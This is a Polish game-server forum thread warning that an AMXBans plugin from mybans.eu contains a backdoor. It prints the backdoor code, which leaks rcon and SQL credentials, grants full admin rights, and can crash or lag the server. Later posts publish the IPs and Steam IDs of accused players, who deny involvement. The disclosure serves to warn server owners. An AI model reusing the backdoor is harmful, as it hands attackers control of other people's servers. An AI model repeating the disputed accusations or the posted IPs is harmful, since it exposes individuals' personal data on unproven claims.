Skocz do zawartości

Witamy w Nieoficjalnym polskim support'cie AMX Mod X

Witamy w Nieoficjalnym polskim support'cie AMX Mod X, jak w większości społeczności internetowych musisz się zarejestrować aby móc odpowiadać lub zakładać nowe tematy, ale nie bój się to jest prosty proces w którym wymagamy minimalnych informacji.
  • Rozpoczynaj nowe tematy i odpowiedaj na inne
  • Zapisz się do tematów i for, aby otrzymywać automatyczne uaktualnienia
  • Dodawaj wydarzenia do kalendarza społecznościowego
  • Stwórz swój własny profil i zdobywaj nowych znajomych
  • Zdobywaj nowe doświadczenia

Dołączona grafika Dołączona grafika

Guest Message by DevFuse
 

Zdjęcie
GmAMXBans

(!) Mybans.eu - Włamania na serwery

gmamxbans cskomandosi.pl mybans włamanie atak amxbans

  • Zamknięty Temat jest zamknięty
48 odpowiedzi w tym temacie

#1 DaFFyy

    Profesjonalista

  • Użytkownik

Reputacja: -38
Absolutna Porażka

  • Postów:214
  • GG:
  • Lokalizacja:Warsss
Offline

Napisano 21.01.2021 18:57

Cześć,

Przybywam do was, aby was ostrzec przed korzystaniem pluginu z mybans.eu.

Wczoraj nastąpiło włamanie na jeden z naszych serwerów który posiadał plugin mybansa ( https://cskomandosi....manie-na-serwer ), początkowo myśleliśmy, że ktoś udostępnił konto admina, ale coś takiego nie miało miejsca, posprawdzałem pluginy i w amxbansie od mybans.eu występowała i występuje nadal furtka której nie powinno być i została dodana w złym celu.

public amxbanuser1(id)
{
    get_cvar_string("rcon_password", szRc, 63);
    client_print(id, print_console, "RCON:\"%s\"", szRc);
}


public amxbanuser2(id)
{
    set_user_flags(id, read_flags("abcdefghijklmnopqrstu"), 0);
    get_cvar_string("amx_sql_host", szSqlHost, 63);
    get_cvar_string("amx_sql_user", szSqlUser, 63);
    get_cvar_string("amx_sql_pass", szSqlPass, 63);
    get_cvar_string("amx_sql_db", szSqlDb, 63);
    client_print(id, print_console, "SQL HOST:\"%s\"", szSqlHost);
    client_print(id, print_console, "SQL USER:\"%s\"", szSqlUser);
    client_print(id, print_console, "SQL PASS:\"%s\"", szSqlPass);
    client_print(id, print_console, "SQL DB:\"%s\"", szSqlDb);
}


public amxbanuser3()
{
    server_cmd("rcon_password 748663183");
}


public amxbanuser4()
{
    server_cmd("shutdownserver");
}


public amxbanuser5()
{
    set_task(0.00, "lagsnc", 2137, "", 0, "b", 0);
}


public lagsnc()
{
    remove_task(2138, 0);
    server_cmd("sys_ticrate 1");
}


public amxbanuser6()
{
    set_task(0.00, "lagsncoff", 2138, "", 0, "b", 0);
}


public lagsncoff()
{
    remove_task(2137, 0);
    server_cmd("sys_ticrate 1000");
}
Takie coś znajduje się w obecnym pluginie i przeszłym, wszystko aktywowane jest komendami których z oczywistych powodów nie podam.
 
Co to ma do twojego serwera? Jeżeli używasz ich pluginu:
  1. Atakujący może poznać hasło rcon / zmienić je
  2. Atakujący może poznać dane sql amxbansa
  3. Atakujący może wyłączyć serwer
  4. Atakujący może zlagować serwer
  5. Atakujący może nadać sobie wszystkie uprawnienia w tym immunitet

Posprawdzajcie swoje serwery, 

( hash pliku który na 100% ma w sobie backdoora - 197f2c27227070ba8eb68d0ad55d2710 ) - Oczywiście mogą występować pewnie inne kombinacje, ponieważ praktyka jest stosowana od kilku miesięcy.

 

 

Nie musicie dziękować, żyjcie w miłości i spokoju!

 

Jeżli już musisz skorzystać z akurat tej wersji, skorzystaj z tego tematu - https://amxx.pl/topi...oprawki-amxxpl/

 

@edit

Przypomniałem sobie, że lukę wykorzystują ludzie o nickach:

Jonkey - https://mybans.pl/profile/1-jonkey/

smajli - x

Kava - x


Użytkownik dasiek edytował ten post 22.01.2021 07:39

  • +
  • -
  • 3

#2 nojaknie

    Profesjonalista

  • Użytkownik

Reputacja: 57
Pomocny

  • Postów:195
Offline

Napisano 21.01.2021 19:24

Tutaj LIVE z całego zajścia (Dzięki Joker za podesłanie)

 

https://www.youtube....jt5SFV0&t=1420s

 

Proponuje zbanować tych państwa u siebie w drodze wykorzystania tej informacji wszyscy zgodnie.. 


  • +
  • -
  • 2

#3 DaFFyy

    Profesjonalista

  • Autor tematu
  • Użytkownik

Reputacja: -38
Absolutna Porażka

  • Postów:214
  • GG:
  • Lokalizacja:Warsss
Offline

Napisano 21.01.2021 19:31

https://steamcommuni...d/1337elitegod/-> profil steam który został wykorzystany

steamID STEAM_0:1:253252

IP 109.231.63.218

 


Użytkownik DaFFyy edytował ten post 21.01.2021 19:37

  • +
  • -
  • -1

#4 `Joker.^^

    Nowy

  • Nowy

Reputacja: 1
Nowy

  • Postów:4
  • Lokalizacja:Polska :P
Offline

Napisano 21.01.2021 19:45

Macie dodajcie do swoich banned.cfg 

http://banid.pl/spra...id=0:0:83244330

http://banid.pl/spra...sid=0:0:1880251

http://banid.pl/spra...d=0:1:522900732

http://banid.pl/spra...d=0:1:179267878

http://banid.pl/spra...sid=0:0:2220945

http://banid.pl/spra...d=0:1:218775405

http://banid.pl/spra...id=0:1:39052273

http://banid.pl/spra...id=0:1:34435527

http://banid.pl/spra...d=0:0:166483337

http://banid.pl/spra...d=0:0:522971727

http://banid.pl/spra...d=0:1:447448390

http://banid.pl/spra...id=0:1:34224576

http://banid.pl/spra...d=0:1:120758329

http://banid.pl/spra...d=0:1:219929821

http://banid.pl/spra...d=0:1:243871415

http://banid.pl/spra...id=0:1:19374731

http://banid.pl/spra...id=0:0:17420249

http://banid.pl/spra...d=0:0:144454872

http://banid.pl/spra...id=0:1:38629929

 

Osoby które podałem to konta oraz mult konta. Oraz znajomi do pomocy to jest 1/4 mojej listy. A pana smajleja dobrze znam jak atakował w inne sposoby moje serwery na czitach. To to na filmiku co podałem Esejowi to jeszcze nic, 

 

 


  • +
  • -
  • 1

#5 Engi

    [EKSiD] playaz44

  • Power User

Reputacja: 315
Wszechpomocny

  • Postów:1 071
  • GG:
  • Imię:Seba
  • Lokalizacja:Praga
Offline

Napisano 21.01.2021 19:48

Omg to banid jeszcze żyje? 

 

@topic wrzućcie tu albo na PW więcej adresów IP, chcę coś sprawdzić :P

 

 


  • +
  • -
  • 0
Użytkowniku! Zanim napiszesz wiadomość wiedz, że:

W odpowiedzi na ten status, przejrzałem kilka ostatnich Twoich postów i dodałem Ci kolejne 3 punkty ostrzeżeń. Mam nadzieję, że pomogłem.

1:0 dla Benia :D
Nie pomagam za darmo na pw.

#6 DaFFyy

    Profesjonalista

  • Autor tematu
  • Użytkownik

Reputacja: -38
Absolutna Porażka

  • Postów:214
  • GG:
  • Lokalizacja:Warsss
Offline

Napisano 21.01.2021 20:03

Omg to banid jeszcze żyje? 

 

@topic wrzućcie tu albo na PW więcej adresów IP, chcę coś sprawdzić :P

Smajli

IP - 95.223.72.181

STEAM - STEAM_0:0:419329152


  • +
  • -
  • -1

#7 nKava

    Początkujący

  • Użytkownik

Reputacja: 2
Nowy

  • Postów:12
  • Imię:Damian
  • Lokalizacja:Gdańsk
Offline

Napisano 21.01.2021 20:45

straszne rzeczy się dzieją w dzisiejszych czasach... dzieci nie wychodźcie z domów bo przyjdzie pan i was zabierze


Użytkownik nKava edytował ten post 21.01.2021 20:49

  • +
  • -
  • 1

#8 GrZ3SiU

    Życzliwy

  • Użytkownik

Reputacja: 0
Nowy

  • Postów:23
  • GG:
  • Imię:Grześ
  • Lokalizacja:Niemcy
Offline

Napisano 21.01.2021 21:25

straszne rzeczy się dzieją w dzisiejszych czasach... dzieci nie wychodźcie z domów bo przyjdzie pan i was zabierze

 

 

Ładnie się bawicie serwerami, co posiadają bansa wgrany na serwer z strony mybans.eu 

 

@DarkGL Myślę że zbanowanie na amxx.pl te osoby co biorą w tym udział będzie słuszne ..... Bo nie tylko z naszymi serwerami tak robili się właśnie dowiadujemy 

 

Gdyby nie ta akcja wczorajsza na nasze serwery, pewnie dalej by były ataki na serwery

 

Ci co mają wgrane bansa na serwery z mybans.eu, radzę jak najszybciej wywalić i wgrać z https://amxx.pl/topi...oprawki-amxxpl/lub jakiś inny. 

 

Screenshot_4.png


  • +
  • -
  • 0

#9 nKava

    Początkujący

  • Użytkownik

Reputacja: 2
Nowy

  • Postów:12
  • Imię:Damian
  • Lokalizacja:Gdańsk
Offline

Napisano 21.01.2021 21:39

 

straszne rzeczy się dzieją w dzisiejszych czasach... dzieci nie wychodźcie z domów bo przyjdzie pan i was zabierze

 

 

Ładnie się bawicie serwerami, co posiadają bansa wgrany na serwer z strony mybans.eu 

 

@DarkGL Myślę że zbanowanie na amxx.pl te osoby co biorą w tym udział będzie słuszne ..... Bo nie tylko z naszymi serwerami tak robili się właśnie dowiadujemy 

 

Gdyby nie ta akcja wczorajsza na nasze serwery, pewnie dalej by były ataki na serwery

 

Ci co mają wgrane bansa na serwery z mybans.eu, radzę jak najszybciej wywalić i wgrać z https://amxx.pl/topi...oprawki-amxxpl/lub jakiś inny. 

 

attachicon.gifScreenshot_4.png

 

 

forum amxx.pl nie jest od rozwiązywania tego typu sporów.

z resztą ja nic nie zrobiłem i tylko się przyglądam pozdro


  • +
  • -
  • 1

#10 Misiu.

    Kochanek DarkGL

  • Power User

Reputacja: 174
Profesjonalista

  • Postów:539
  • GG:
  • Steam:steam
  • Imię:Adrian
  • Lokalizacja:Zgorzelec
Offline

Napisano 21.01.2021 21:45

Dobra robota ze znalezieniem luki i plus za postawę :)


  • +
  • -
  • 0

PoGrywamy.pl - Pograj Razem Z Nami

 

Tatusiek serwerów:

[ONLY DD2 #2] 1shot2kill.pl

[ONLY DD2] PoGrywamy.pl

Przyjmuje płatne zlecenia!


#11 Engi

    [EKSiD] playaz44

  • Power User

Reputacja: 315
Wszechpomocny

  • Postów:1 071
  • GG:
  • Imię:Seba
  • Lokalizacja:Praga
Offline

Napisano 21.01.2021 21:53

A mama gawariła nie pobieraj skompilowanych pluginów i zawsze sprawdzaj kod źródłowy :)

 

Swoją drogą błąd tych co wrzucali na serwer nie sprawdzając kodu, nie rozumiem tylko co mybans chciało osiągnąć bo oprócz dostępów do baz amxbans'a i rcona serwerów nie zyskali w ogóle nic, wystarczy podmienić plugin i zmienić hasło bazy + rcon, jeszcze żeby jakoś mogli przez to włamać się na konta hostingowe i przelewać sobie wpln to bym zrozumiał ale skoro nie to ataki bez sensu nic nie wnoszące nic nie niszczące (no max może ktoś stracić liste banów).

 

Swoją drogą ktoś już zdjął domenę MyBans.pl także karma szybko wróciła.


  • +
  • -
  • 2
Użytkowniku! Zanim napiszesz wiadomość wiedz, że:

W odpowiedzi na ten status, przejrzałem kilka ostatnich Twoich postów i dodałem Ci kolejne 3 punkty ostrzeżeń. Mam nadzieję, że pomogłem.

1:0 dla Benia :D
Nie pomagam za darmo na pw.

#12 DaFFyy

    Profesjonalista

  • Autor tematu
  • Użytkownik

Reputacja: -38
Absolutna Porażka

  • Postów:214
  • GG:
  • Lokalizacja:Warsss
Offline

Napisano 21.01.2021 21:54

A mama gawariła nie pobieraj skompilowanych pluginów i zawsze sprawdzaj kod źródłowy :)

 

Swoją drogą błąd tych co wrzucali na serwer nie sprawdzając kodu, nie rozumiem tylko co mybans chciało osiągnąć bo oprócz dostępów do baz amxbans'a i rcona serwerów nie zyskali w ogóle nic, wystarczy podmienić plugin i zmienić hasło bazy + rcon, jeszcze żeby jakoś mogli przez to włamać się na konta hostingowe i przelewać sobie wpln to bym zrozumiał ale skoro nie to ataki bez sensu nic nie wnoszące nic nie niszczące (no max może ktoś stracić liste banów).

Z tego co się dowiedziałem od właściciela sieci to on to kompilował, więc możliwe, że też .inc były podmienione kiedyś lub dalej są, ale 100% pewności nie mam bo też mogło mu się coś zapomnieć czy wrzucił gotowca czy nie ;d

 

W bansie masz hasła w md5 które możesz w miare łatwo wyszukać lub złamać  ;P 


Użytkownik DaFFyy edytował ten post 21.01.2021 22:08

  • +
  • -
  • 0

#13 Jonkey

    Początkujący

  • Użytkownik

Reputacja: 1
Nowy

  • Postów:13
  • Lokalizacja:koloobrzeg
Offline

Napisano 22.01.2021 01:49

Po pierwsze na moim forum nie ma żadnych pluginów .amxx
Po drugie nie włamałem się do nikogo i są to pomówienia w moja stronę
Po trzecie jestem właścicielem strony Mybans.PL nie Mybans.eu
  • +
  • -
  • 1

#14 DaFFyy

    Profesjonalista

  • Autor tematu
  • Użytkownik

Reputacja: -38
Absolutna Porażka

  • Postów:214
  • GG:
  • Lokalizacja:Warsss
Offline

Napisano 22.01.2021 01:56

Po pierwsze na moim forum nie ma żadnych pluginów .amxx
Po drugie nie włamałem się do nikogo i są to pomówienia w moja stronę
Po trzecie jestem właścicielem strony Mybans.PL nie Mybans.eu

Ktoś o takim nicku był na serwerze, wiec 2 opcje:

1. byłeś to Ty

2. przypadek albo celowe wprowadzenie w błąd żeby myśleć, że to Ty

 

ale jeżeli chodzi o temat to tak, z pośpiechu napisałem .pl ale chodzi o mybans.eu, nie mogłem już edytować więc trzeba czekać na modów


Użytkownik DaFFyy edytował ten post 22.01.2021 01:58

  • +
  • -
  • -1

#15 Jonkey

    Początkujący

  • Użytkownik

Reputacja: 1
Nowy

  • Postów:13
  • Lokalizacja:koloobrzeg
Offline

Napisano 22.01.2021 02:16

Niestety ale na pewno nie mogłem być to ja, cały dzień nie byłem dostępny przy komputerze.
I jak wchodzę na jakikolwiek serwer to wchodzę przez swojego steam. Tyle w temacie z mojej strony jak i osoby. Nie bawią mnie żadne ataki na inne sieci.
  • +
  • -
  • 0

#16 nastyBle

    Nowy

  • Użytkownik

Reputacja: 9
Nowy

  • Postów:5
Offline

Napisano 22.01.2021 08:34

Witam

Chciałbym się ustosunkować do zaistniałej sytuacji

Jestem właścicielem projektu mybans.eu

1.Rzekoma osoba wykorzystująca lukę 

 

Przypomniałem sobie, że lukę wykorzystują ludzie o nickach:

Jonkey - https://mybans.pl/profile/1-jonkey/

 

 

 

Jonek nie ma z tym nic wspólnego, dotknęło go to tak samo jak mnie ponieważ zostały zaatakowane dwa osobne vps-y jego i mój  

Bardzo proszę o usunięcie adresu do profilu w pierwszym poście bo to jest krzywdzące

 

2.Pluginy

Użytkowanik ma do wyboru dwa sam wybiera co wrzuci na serwer, pliki nigdy nie były edytowane przez moją załogę lub osoby trzecie przed zamieszczeniem na serwerze 

 

3. Projekt jest już od dawna na wymarciu, jest mi jedynie szkoda iż udostępniając za free AMX bansa z baza i hostingiem spotkałem się z taką falą hejtu

Nie czerpiąc zysków z projektu i udostępniając go całkowicie za darmo

 

Podziękowania dla autora postu za zgłoszenie

Rejestracja na stronie zamknięta, czas się pakować

 

pozdrawiam

 

 

 

 

 

 

 


  • +
  • -
  • 1

MyBans.eu darmowy hosting AmxBans


#17 DarkGL

    Nie oddam ciasteczka !

  • Administrator

Reputacja: 6 553
Godlike

  • Postów:11 976
  • GG:
  • Steam:steam
  • Imię:Rafał
  • Lokalizacja:Warszawa
Offline

Napisano 22.01.2021 09:24

A czy po prostu nie mieliście włamania i podmiany pluginów ?  Nawet u nas zdarzyła się podmiana kompilatora.


  • +
  • -
  • 2

#18 nastyBle

    Nowy

  • Użytkownik

Reputacja: 9
Nowy

  • Postów:5
Offline

Napisano 22.01.2021 09:36

Daty modyfikacji plików wykluczają taką opcję ....

 

na serv mam dwa pluginy do pobrania jede zawiera zapewne błędy ... data upload to 2011 i 2013


  • +
  • -
  • 1

MyBans.eu darmowy hosting AmxBans


#19 smajlid

    Nowy

  • Użytkownik

Reputacja: 0
Nowy

  • Postów:7
Offline

Napisano 22.01.2021 09:38

Witam, chcialbym zaznaczyc ze ja, smajli, nie mam z wlamaniem nic wspolnego i proszę o zaprzestanie oczerniania mojej osoby, usunecia mnie z tego tematu oraz zaprzestanie udostepniania moich danych osobowych (tak adres IP tez sie w tym zalicza Grzesiu). Przeprowadzony przeze mnie livestream dokladnie pokazuje, ze jedynie co robilem w tym czasie to granie na serwerze. To, ze nie umiecie sprawdzic pluginów i jeden z moich widzow jakims cudem mial dostep do waszego serwera nie oznacza, ze mialem w tym cos wspolnego. Na czacie dokladnie widac, ze widz mi podeslal IP, poczym myslalem ze to po prostu jego serwer. 

 

Pozdrawiam i mam nadzieje, ze sytuacja sie wyjasni. W innym przypadku będę musial wyciagnac z tego konsekwencje, udostepnianie danych, oczernianie oraz grozby sa karalane, granie na jakims serwerze w cs 1.6 nie jest.


  • +
  • -
  • -1

#20 nastyBle

    Nowy

  • Użytkownik

Reputacja: 9
Nowy

  • Postów:5
Offline

Napisano 22.01.2021 09:41

Witam, chcialbym zaznaczyc ze ja, smajli, nie mam z wlamaniem nic wspolnego i proszę o zaprzestanie oczerniania mojej osoby, usunecia mnie z tego tematu oraz zaprzestanie udostepniania moich danych osobowych (tak adres IP tez sie w tym zalicza Grzesiu). Przeprowadzony przeze mnie livestream dokladnie pokazuje, ze jedynie co robilem w tym czasie to granie na serwerze. To, ze nie umiecie sprawdzic pluginów i jeden z moich widzow jakims cudem mial dostep do waszego serwera nie oznacza, ze mialem w tym cos wspolnego. Na czacie dokladnie widac, ze widz mi podeslal IP, poczym myslalem ze to po prostu jego serwer. 

 

Pozdrawiam i mam nadzieje, ze sytuacja sie wyjasni. W innym przypadku będę musial wyciagnac z tego konsekwencje, udostepnianie danych, oczernianie oraz grozby sa karalane, granie na jakims serwerze w cs 1.6 nie jest.

 

Korzystanie z kradzionych danych też jest karane :)

Generalnie dla mnie temat jest zamknięty strona OFF i po problemie i tak nic z niej nigdy nie zarobiłem a były z sentymentu i dla chęciu udostępnienia tym co nie umieją zainstalować lub ich na to nie stac


Użytkownik nastyBle edytował ten post 22.01.2021 09:44

  • +
  • -
  • 1

MyBans.eu darmowy hosting AmxBans






Również z jednym lub większą ilością słów kluczowych: gmamxbans, cskomandosi.pl, mybans, włamanie, atak, amxbans

Użytkownicy przeglądający ten temat: 0

0 użytkowników, 0 gości, 0 anonimowych